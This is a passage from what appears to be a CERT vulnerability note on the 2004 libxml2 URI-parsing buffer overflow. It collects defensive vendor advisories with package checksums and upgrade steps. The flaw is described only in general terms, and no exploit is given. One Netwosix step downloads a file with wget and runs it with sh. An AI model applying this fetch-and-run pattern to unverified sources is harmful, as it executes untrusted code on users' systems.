\ncraft the URL, then this flaw could be used to execute arbitrary code. \n \nFor the stable distribution (woody) this problem has been fixed in \nversion 1.8.17-2woody1 of libxml and version 2.4.19-4woody1 of libxml2. \n \nFor the unstable distribution (sid) this problem has been fixed in \nversion 1.8.17-5 of libxml and version 2.6.6-1 of libxml2. \n \nWe recommend that you upgrade your libxml1 and libxml2 packages. \n \n \nUpgrade Instructions \n- -------------------- \n \nwget url \nwill fetch the file for you \ndpkg -i file.deb \nwill install the referenced file. \n \nIf you are using the apt-get package manager, use the line for \nsources.list as given below: \n \napt-get update \nwill update the internal database \napt-get upgrade \nwill install corrected packages \n \nYou may use an automated update by adding the resources from the \nfooter to the proper configuration. \n \n \nDebian GNU/Linux 3.0 alias woody \n- -------------------------------- \n \nSource archives: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-2woody1.dsc>`` \nSize/MD5 checksum: 651 16512f774479d73b7d82ca4e1db527f5 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-2woody1.diff.gz>`` \nSize/MD5 checksum: 33976 68afef27edf44d2b81e02fde3431bca8 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17.orig.tar.gz>`` \nSize/MD5 checksum: 1016403 b8f01e43e1e03dec37dfd6b4507a9568 \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1.dsc>`` \nSize/MD5 checksum: 654 6f56380f9bfade2c66f03956e1a65162 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1.diff.gz>`` \nSize/MD5 checksum: 344358 ba3ea49cc8c465ff1a6377780c35a45d \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19.orig.tar.gz>`` \nSize/MD5 checksum: 1925487 22e3c043f57e18baaed86c5fff3eafbc \n \nAlpha architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_alpha.deb>`` \nSize/MD5 checksum: 381994 dc3ada5391f52bdfd642df1bc5b9a6be \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_alpha.deb>`` \nSize/MD5 checksum: 208830 a0698c267c722bf5127ee3709024ecc9 \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_alpha.deb>`` \nSize/MD5 checksum: 388786 a4ece19b65c46dd0e8f889c26e5938b3 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_alpha.deb>`` \nSize/MD5 checksum: 938568 5f3e46bd132c9167db9e93ca3c739952 \n \nARM architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_arm.deb>`` \nSize/MD5 checksum: 392536 9e126158928d24a562ae1d2b3d35ae1d \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_arm.deb>`` \nSize/MD5 checksum: 184172 0527fd6a14e003139be9b475e689ee41 \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_arm.deb>`` \nSize/MD5 checksum: 346060 6b9caeac9a0061576f8a1e5b46ed8671 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_arm.deb>`` \nSize/MD5 checksum: 902966 688fb8c5ea18b0f9d8e7671dad5426c5 \n \nIntel IA-32 architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_i386.deb>`` \nSize/MD5 checksum: 330042 b1c61849e10edbe597429fcd05d1d2b3 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_i386.deb>`` \nSize/MD5 checksum: 183310 3c217f980c138f24eac1a0abd89eba78 \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_i386.deb>`` \nSize/MD5 checksum: 333034 11cfc7169e549c63dccf28f15300a8eb \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_i386.deb>`` \nSize/MD5 checksum: 843084 43a242f53ed8a688e5ed02284a150f52 \n \nIntel IA-64 architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_ia64.deb>`` \nSize/MD5 checksum: 447184 5bfa2835a9d9b43da6d31e1cadce6bc1 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_ia64.deb>`` \nSize/MD5 checksum: 285484 a378583eaaaf1248aba8de4fd721c5fc \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_ia64.deb>`` \nSize/MD5 checksum: 507452 b447844080f6e0c1d498b34ec849c9b2 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_ia64.deb>`` \nSize/MD5 checksum: 1032662 ddd7aae0835fe1edb04aee7cdf2e41c0 \n \nHP Precision architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_hppa.deb>`` \nSize/MD5 checksum: 439372 d5f629dc7f885dd858671ab639d954f8 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_hppa.deb>`` \nSize/MD5 checksum: 248212 837ec145aac757ce053075a4736ddb55 \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_hppa.deb>`` \nSize/MD5 checksum: 425454 0719d6e0835b6dae714b1ce1a0bd9d77 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_hppa.deb>`` \nSize/MD5 checksum: 979152 41e110f4c9805a5afb94fff79d1f3d22 \n \nMotorola 680x0 architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_m68k.deb>`` \nSize/MD5 checksum: 318176 d0dcb654f8083e0873396d38aaa1a7a2 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_m68k.deb>`` \nSize/MD5 checksum: 178226 c18c0c7bb3c0884c62f36922e5843e83 \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_m68k.deb>`` \nSize/MD5 checksum: 336902 2990a52db32dc3fd3108be4e677e59bf \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_m68k.deb>`` \nSize/MD5 checksum: 828820 6378b37494b667bce472f934f50c3cb8 \n \nBig endian MIPS architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_mips.deb>`` \nSize/MD5 checksum: 376266 1c226409e23047ec521224697a82f76c \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_mips.deb>`` \nSize/MD5 checksum: 183628 0fa6098bdbfeadb50dfb7e5f4f2c967c \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_mips.deb>`` \nSize/MD5 checksum: 348902 474e9b8bc026ca199218727203422c12 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_mips.deb>`` \nSize/MD5 checksum: 921098 b8aa537054fc482ab042647ac0551f94 \n \nLittle endian MIPS architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_mipsel.deb>`` \nSize/MD5 checksum: 373696 603708cf407ea49748c987bea0ddaade \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_mipsel.deb>`` \nSize/MD5 checksum: 182958 5397950eb709142774a2aa70f5faa9db \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_mipsel.deb>`` \nSize/MD5 checksum: 343660 985465f428571c774bb3b44699768c15 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_mipsel.deb>`` \nSize/MD5 checksum: 915010 0553eb273d500c82b93cac55b7c52ad4 \n \nPowerPC architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_powerpc.deb>`` \nSize/MD5 checksum: 356590 f97bc218912092bae051188dd9c157d5 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_powerpc.deb>`` \nSize/MD5 checksum: 194062 b37b9d75744323dafdc4a76293c3456d \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_powerpc.deb>`` \nSize/MD5 checksum: 376486 bdfb8d5a839f65286e57e34857fd14f1 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_powerpc.deb>`\n\n` Size/MD5 checksum: 916952 90f7f069508d26431cc61f967886b159 \n \nIBM S/390 architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_s390.deb>`` \nSize/MD5 checksum: 329398 2b6046a2aeb468a00abc8556676d10d1 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_s390.deb>`` \nSize/MD5 checksum: 184216 78803336930258db2d7b115c4b708fad \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_s390.deb>`` \nSize/MD5 checksum: 360282 a7bb4f832d6a4d86753b3d046f4e8fa1 \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_s390.deb>`` \nSize/MD5 checksum: 857396 e7efd1f4a92ba1f6a1a3c96e5c5a851b \n \nSun Sparc architecture: \n \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_sparc.deb>`` \nSize/MD5 checksum: 347058 88ec785a5184e9ff44e617638b661be4 \n``<http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_sparc.deb>`` \nSize/MD5 checksum: 196108 da3f13d8c4e4ffd8604cd01cf26c781f \n \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_sparc.deb>`` \nSize/MD5 checksum: 363670 ab415cd91562622e7ab2dde1df98a09b \n``<http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_sparc.deb>`` \nSize/MD5 checksum: 886976 ba693e42209a963c26f325d89ecbe989 \n \nThese files will probably be moved into the stable distribution on \nits next revision. \n \n- --------------------------------------------------------------------------------- \nFor apt-get: deb ``<http://security.debian.org/>`` stable/updates main \nFor dpkg-ftp: ``<ftp://security.debian.org/debian-security>`` dists/stable/updates/main \nMailing list: debian-security-announce@lists.debian.org \nPackage info: `apt-cache show <pkg>' and <http://packages.debian.org/><pkg> \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.4 (GNU/Linux) \n \niD8DBQFARwN/W5ql+IAeqTIRAi+4AJoD/hPYY6rzbWuQGpwymgMPeDppXwCgsZ5c \ncfOHbrGF3l7tC0/FaeVfgiU= \n=QWbs \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### Fedora Project __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00029.html>[](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00029.html>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n**SECURITY: Update of libxml2 2.6.6 available**\n\n* * *\n\n * _From_: Daniel Veillard <veillard redhat com>\n * _To_: fedora-announce-list redhat com\n * _Subject_: SECURITY: Update of libxml2 2.6.6 available\n * _Date_: Wed, 25 Feb 2004 16:43:43 -0500\n\n* * *\n\n \n\\--------------------------------------------------------------------- \nFedora Update Notification \nFEDORA-2004-087 \n2004-02-25 \n\\--------------------------------------------------------------------- \n \nName : libxml2 \nVersion : 2.6.6 \nRelease : 3 \nSummary : Library providing XML and HTML support \nDescription : \nThis library allows to manipulate XML files. It includes support \nto read, modify and write XML and HTML files. There is DTDs support \nthis includes parsing and validation even with complex DtDs, either \nat parse time or later once the document has been modified. The output \ncan be a simple SAX stream or and in-memory DOM like representations. \nIn this case one can use the built-in XPath and XPointer implementation \nto select subnodes or ranges. A flexible Input/Output mechanism is \navailable, with existing HTTP and FTP modules and combined to an \nURI library. \n \n\\--------------------------------------------------------------------- \nUpdate Information: \n \nUpdated libxml2 packages are available to fix an overflow when parsing \nthe URI for remote resources. \n\\--------------------------------------------------------------------- \n* Thu Feb 12 2004 Daniel Veillard <veillard redhat com> \n \n\\- upstream release 2.6.6 see [_http://xmlsoft.org/news.html_](<http://xmlsoft.org/news.html>) \n \n \n\\--------------------------------------------------------------------- \nThis update can be downloaded from: \n[_http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/_](<http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/>) \n \nc46c9ba42ba7d27bfcf48899119a1d40 SRPMS/libxml2-2.6.6-3.src.rpm \nd7a9dec974250e425d6052e0f648b6c5 i386/libxml2-2.6.6-3.i386.rpm \n0758aa446c1a43d18bc016df35288806 i386/libxml2-devel-2.6.6-3.i386.rpm \n07843af17c126497f4baa8d279c7d920 i386/libxml2-python-2.6.6-3.i386.rpm \nae7105805216615e6460c60be9c679da i386/debug/libxml2-debuginfo-2.6.6-3.i386.rpm \n \nThis update can also be installed with the Update Agent; you can \nlaunch the Update Agent with the 'up2date' command. \n\\--------------------------------------------------------------------- \n \nDaniel \n \n\\-- \nDaniel Veillard | Red Hat Network [_https://rhn.redhat.com/_](<https://rhn.redhat.com/>) \nveillard redhat com | libxml GNOME XML XSLT toolkit [_http://xmlsoft.org/_](<http://xmlsoft.org/>) \n[_http://veillard.com/_](<http://veillard.com/>) | Rpmfind RPM search engine [_http://rpmfind.net/_](<http://rpmfind.net/>) \n \n \n \n \n\n\n* * *\n\n[[_Date Prev_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00028.html>)][[_Date Next_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00030.html>)] [[_Thread Prev_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00028.html>)][[_Thread Next_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00030.html>)] [[_Thread Index_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/thread.html#00029>)] [[_Date Index_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/date.html#00029>)] [[_Author Index_](<http://www.redhat.com/archives/fedora-announce-list/2004-February/author.html#00029>)] \n\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### GNOME Project __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://lists.gnome.org/archives/gnome-announce-list/2004-February/msg00051.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n**ANNOUNCE: The GNOME XML toolkit 2.6.6**\n\n* * *\n\n * _From_: Daniel Veillard <veillard redhat com>\n * _To_: gnome-announce-list gnome org\n * _Subject_: ANNOUNCE: The GNOME XML toolkit 2.6.6\n * _Date_: Thu, 12 Feb 2004 12:28:49 -0500 (EST)\n\n* * *\n\n \nApplication \n=========== \n \nThe GNOME XML toolkit 2.6.6 \n \nDescription \n=========== \n \nLibxml2 is the XML C parser and toolkit developed for the Gnome project \n(but usable outside of the Gnome platform). \nIt also provides the xmllint XML/HTML processing tool. \nThis release fix a potential security problem, people are advised to \nupgrade. \n \nEnhancements \n============ \n \n\\- Parsers: added xmlByteConsumed(ctxt) API to get the byte offest in \ninput. \n\\- XInclude: allow the 2001 namespace without warning. \n\\- reader API: structured error reporting (Steve Ball) \n \nFixes \n===== \n \n\\- nanohttp and nanoftp: buffer overflow error on URI parsing (Igor and \nWilliam) \nreported by Yuuichi Teranishi \n\\- make test and path issues \n\\- xmlWriter attribute serialization (William Brack) \n\\- xmlWriter indentation (William) \n\\- schemas validation (Eric Haszlakiewicz) \n\\- XInclude dictionnaries issues (William and Oleg Paraschenko) \n\\- XInclude empty fallback (William) \n\\- HTML warnings (William) \n\\- XPointer in XInclude (William) \n\\- Python namespace serialization \n\\- isolat1ToUTF8 bound error (Alfred Mickautsch) \n\\- output of parameter entities in internal subset (William) \n\\- internal subset bug in push mode \n\\- <xs:all> fix (Alexey Sarytchev) \n\\- Build: fix for automake-1.8 (Alexander Winston) \nwarnings removal (Philip Ludlam) \nSOCKLEN_T detection fixes (Daniel Richard) \nfix --with-minimum configuration. \n\\- Documentation: missing example/index.html (John Fleck) \nversion dependancies (John Fleck) \n\\- Windows compilation: mingw, msys (Mikhail Grushinskiy), \nfunction prototype (Cameron Johnson), \nMSVC6 compiler warnings, \n_WINSOCKAPI_ patch \n \nDownload \n======== \n \n[_ftp://xmlsoft.org/_](<ftp://xmlsoft.org/>) \n \nWebsite \n======= \n \n[_http://xmlsoft.org/_](<http://xmlsoft.org/>) \n \nGNOME Software Map entry \n======================== \n \n[_http://www.gnome.org/softwaremap/projects/libxml_](<http://www.gnome.org/softwaremap/projects/libxml>) \n \n \n\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### Gentoo Linux __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://bugs.gentoo.org/show_bug.cgi?id=42735> or `<http://secunia.com/advisories/11051/>`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \nGentoo Linux Security Advisory GLSA 200403-01 \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n~ ``<http://security.gentoo.org>`` \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n \n~ Severity: Normal \n~ Title: Libxml2 URI Parsing Buffer Overflow Vulnerabilities \n~ Date: March 06, 2004 \n~ Bugs: #42735 \n~ ID: 200403-01 \n \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n \nSynopsis \n======== \n \nA buffer overflow has been discovered in libxml2 versions prior to \n2.6.6 which may be exploited by an attacker allowing the execution of \narbitrary code. \n \nDescription \n=========== \n \nYuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. \nWhen the libxml2 library fetches a remote resource via FTP or HTTP, \nlibxml2 uses parsing routines that can overflow a buffer caused by \nimproper bounds checking if they are passed a URL longer than 4096 \nbytes. \n \nImpact \n====== \n \nIf an attacker is able to exploit an application using libxml2 that \nparses remote resources, then this flaw could be used to execute \narbitrary code. \n \nWorkaround \n========== \n \nNo workaround is available; users are urged to upgrade libxml2 to \n2.6.6. \n \nResolution \n========== \n \nAll users are recommended to upgrade their libxml2 installation: \n \n~ # emerge sync \n~ # emerge -pv \">=dev-libs/libxml2-2.6.6\" \n~ # emerge \">=dev-libs/libxml2-2.6.6\" \n \nReferences \n========== \n \n~ [ 1 ] ``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110>`` \n \nConcerns? \n========= \n \nSecurity is a primary focus of Gentoo Linux and ensuring the \nconfidentiality and security of our users machines is of utmost \nimportance to us. Any security concerns should be addressed to \nsecurity@gentoo.org or alternatively, you may file a bug at \n``<http://bugs.gentoo.org>``. \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.4 (GNU/Linux) \nComment: Using GnuPG with Mozilla - ``<http://enigmail.mozdev.org>`` \n \niD8DBQFASl4EMMXbAy2b2EIRAv+yAJ9NbGSqlVb4KzZ2IC4c2DBt3aaV1ACgxlhB \n1c1NaJh9ByyfACBlmAU0Yz4= \n=scAU \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### Linux Netwosix __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://www.netwosix.org/adv04.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n************************************************************************************ \nNetwosix Linux Security Advisory #2004-0004 <<http://www.netwosix.org>> \n\\- ----------------------------------------------------------------------------------- \n \nPackage name: libxml2 \nSummary: Buffer overflow in the nanohttp or nanoftp modules in \nXMLSoft Libxml2 2.6.0 \nDate: 2004-03-04 \nAffected versions: Netwosix 1.0 \n************************************************************************************ \n \n\\- -> Package description: \n\\- ------------------------ \nLibxml2 is the XML C parser and toolkit developed for the Gnome project. \n \n\\- -> Problem description: \n\\- ------------------------ \nA flaw in libxml2 versions prior to 2.6.6 was found by Yuuichi \nTeranishi. When fetching a remote source via FTP or HTTP, libxml2 \nuses special parsing routines that can overflow a buffer if passed a \nvery long URL. In the event that the attacker can find a program that \nuses libxml2 which parses remote resources and allows them to \ninfluence the URL, this flaw could be used to execute arbitrary code. \n \n\\- -> Action: \n\\- ------------------------ \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. \n \n\\- -> Location: \n\\- --------------------- \n \nYou can download the latest version of this package in NEPOTE format from: \n<<http://download.netwosix.org/0004/nepote>> \n \n\\- -> Nepote Update (Nepote has been updated with new ports on 25 February 2004. \nUpdate your portage tree from <http://nepote.netwosix.org>, first): \n\\- --------------------- \n \nSee this instructions to update the port of this package: \n \n# cd /usr/ports/lib/libxml \n# rm nepote \n# wget <http://download.netwosix.org/0004/nepote> \n# sh nepote (to install the new and updated package) \n \n\\- -> References \n\\- --------------------- \n \nSpecific references for this advisory: \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110> \n \n\\- -> About Linux Netwosix: \n\\- --------------------------------- \nLinux Netwosix is a powerful and optimized Linux distribution for servers \nand Network Security related jobs. It can also be used for special operations \nsuch as penetration testing with its big collection of security oriented \nsoftware and sources. It's a light distribution created for the requirements \nof every SysAdmin and it's very portable and highly configurable. Our \nphilosophy is to give greater liberty for configuration to the SysAdmin. \nOnly in this way can he/she configure a powerful and stable server machine. \nLinux Netwosix also has a powerful ports system (Nepote) similar to the xBSD \nsystems but more flexible and usable. \n \n \n\\- -> Questions? \n\\- --------------------- \nCheck out our mailing lists: \n<<http://www.netwosix.org/mailing.html>> \n \n \nThe advisory itself is available at \n<<http://www.netwosix.org/adv04.html>> \n\\- -------------------------------------------------- \n \nMD5sums of the packages: \n\\- - -------------------------------------------------------------------------- \n60cb43bdcc312a611178df10c52a19c6 0004/nepote \n\\- - --------------------------------------------------------------------------\n\n \nVincenzo Ciaglia - Linux Netwosix Security Advisories \n<ciaglia@netwosix.org> \\- <<http://www.netwosix.org>> \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.4 (GNU/Linux) \n \niD8DBQFAR6JP6jz9pGuz4koRAvzeAJ98LXBB30rNXDdkoTjW20FLCVuDmwCeOqsh \n0JB1uL92Ux7adp2bz+uf/0c= \n=ySSs \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23493966 Feedback>).\n\n### MandrakeSoft __ Affected\n\nUpdated: March 09, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:018>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n_______________________________________________________________________ \n \nMandrakelinux Security Update Advisory \n_______________________________________________________________________ \n \nPackage name: libxml2 \nAdvisory ID: MDKSA-2004:018 \nDate: March 3rd, 2004 \n \nAffected versions: 9.1, 9.2, Corporate Server 2.1 \n______________________________________________________________________ \n \nProblem Description: \n \nA flaw in libxml2 versions prior to 2.6.6 was found by Yuuichi \nTeranishi. When fetching a remote source via FTP or HTTP, libxml2 \nuses special parsing routines that can overflow a buffer if passed a \nvery long URL. In the event that the attacker can find a program that \nuses libxml2 which parses remote resources and allows them to \ninfluence the URL, this flaw could be used to execute arbitrary code. \n \nThe updated packages provide a backported fix to correct the problem. \n_______________________________________________________________________ \n \nReferences: \n \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110>`` \n______________________________________________________________________ \n \nUpdated Packages: \n \nCorporate Server 2.1: \n51af35991ac6ceef5cd6ddc4330e1995 corporate/2.1/RPMS/libxml2-2.4.23-4.2.C21mdk.i586.rpm \n34e6aa4c010e14199767c97d5fe0b706 corporate/2.1/RPMS/libxml2-devel-2.4.23-4.2.C21mdk.i586.rpm \n9b551a5dfa4129f88fa90062ed684725 corporate/2.1/RPMS/libxml2-python-2.4.23-4.2.C21mdk.i586.rpm \n7c2efde8dde2fabc15d0c59fd867d156 corporate/2.1/RPMS/libxml2-utils-2.4.23-4.2.C21mdk.i586.rpm \n153ca0fed634a7485046181baf06ea94 corporate/2.1/SRPMS/libxml2-2.4.23-4.2.C21mdk.src.rpm \n \nCorporate Server 2.1/x86_64: \n2bfb3a34f15d5484119f94ea0d8c9d69 x86_64/corporate/2.1/RPMS/libxml2-2.4.23-4.2.C21mdk.x86_64.rpm \n251108957d5ba90a9082d1f1976e5fb7 x86_64/corporate/2.1/RPMS/libxml2-devel-2.4.23-4.2.C21mdk.x86_64.rpm \n7f4d9e5052d9ca41cd0ed8dba78d2416 x86_64/corporate/2.1/RPMS/libxml2-python-2.4.23-4.2.C21mdk.x86_64.rpm \n63e3b6910f6e42b775cb936ce581b16e x86_64/corporate/2.1/RPMS/libxml2-utils-2.4.23-4.2.C21mdk.x86_64.rpm \n153ca0fed634a7485046181baf06ea94 x86_64/corporate/2.1/SRPMS/libxml2-2.4.23-4.2.C21mdk.src.rpm \n \nMandrakelinux 9.1: \n9b91d9a62e88829d180335e93005d706 9.1/RPMS/libxml2-2.5.4-1.2.91mdk.i586.rpm \n42ea5fe9ee7733bab3e726cb0005a9e8 9.1/RPMS/libxml2-devel-2.5.4-1.2.91mdk.i586.rpm \n98642ae61a8884d25878bc91f1d06622 9.1/RPMS/libxml2-python-2.5.4-1.2.91mdk.i586.rpm \n3a7b2acf410ed9d6dc7d34d7e7fc319a 9.1/RPMS/libxml2-utils-2.5.4-1.2.91mdk.i586.rpm \nbbb88662f90ff49f28a2e3e6905106f3 9.1/SRPMS/libxml2-2.5.4-1.2.91mdk.src.rpm \n \nMandrakelinux 9.1/PPC: \nbcf80b555579701ed2ba8925bc1a9634 ppc/9.1/RPMS/libxml2-2.5.4-1.2.91mdk.ppc.rpm \n3f6a1d38b9aaefd39a2ad116ec65643d ppc/9.1/RPMS/libxml2-devel-2.5.4-1.2.91mdk.ppc.rpm \ncdb9ee131ca5bd58564259d6917a9c56 ppc/9.1/RPMS/libxml2-python-2.5.4-1.2.91mdk.ppc.rpm \n3c96adac2eb332f1e535b80e626a2c80 ppc/9.1/RPMS/libxml2-utils-2.5.4-1.2.91mdk.ppc.rpm \nbbb88662f90ff49f28a2e3e6905106f3 ppc/9.1/SRPMS/libxml2-2.5.4-1.2.91mdk.src.rpm \n \nMandrakelinux 9.2: \n6566203ab3c4fb904ae0126196aaf400 9.2/RPMS/libxml2-2.5.11-1.2.92mdk.i586.rpm \n5552925b636b9926059c5c27ca37a588 9.2/RPMS/libxml2-devel-2.5.11-1.2.92mdk.i586.rpm \n377f7250ee689d7ee7453b852e651d02 9.2/RPMS/libxml2-python-2.5.11-1.2.92mdk.i586.rpm \n7e04e506249fbb224690ce3cc6434776 9.2/RPMS/libxml2-utils-2.5.11-1.2.92mdk.i586.rpm \n34048480a99f5f04d02902ab918cf5c8 9.2/SRPMS/libxml2-2.5.11-1.2.92mdk.src.rpm \n \nMandrakelinux 9.2/AMD64: \n12bfba14856691201fb44eeecd2e0760 amd64/9.2/RPMS/lib64xml2-2.5.11-1.2.92mdk.amd64.rpm \n0267276afa32b153be2ab27821f2a45c amd64/9.2/RPMS/lib64xml2-devel-2.5.11-1.2.92mdk.amd64.rpm \n545cdb232a403bb77dbd7ae5881dfe01 amd64/9.2/RPMS/lib64xml2-python-2.5.11-1.2.92mdk.amd64.rpm \n32012969ba7f58a67f8569d86ca90246 amd64/9.2/RPMS/libxml2-utils-2.5.11-1.2.92mdk.amd64.rpm \n34048480a99f5f04d02902ab918cf5c8 amd64/9.2/SRPMS/libxml2-2.5.11-1.2.92mdk.src.rpm \n_______________________________________________________________________ \n \nTo upgrade automatically use MandrakeUpdate or urpmi. The verification \nof md5 checksums and GPG signatures is performed automatically for you. \n \nA list of FTP mirrors can be obtained from: \n \n``<http://www.mandrakesecure.net/en/ftp.php>`` \n \nAll packages are signed by Mandrakesoft for security. You can obtain \nthe GPG public key of the Mandrakelinux Security Team by executing: \n \ngpg --recv-keys --keyserver www.mandrakesecure.net 0x22458A98 \n \nPlease be aware that sometimes it takes the mirrors a few hours to \nupdate. \n \nYou can view other update advisories for Mandrakelinux at: \n \n``<http://www.mandrakesecure.net/en/advisories/>`` \n \nMandrakesoft has several security-related mailing list services that \nanyone can subscribe to. Information on these lists can be obtained by \nvisiting: \n \n``<http://www.mandrakesecure.net/en/mlist.php>`` \n \nIf you want to report vulnerabilities, please contact \n 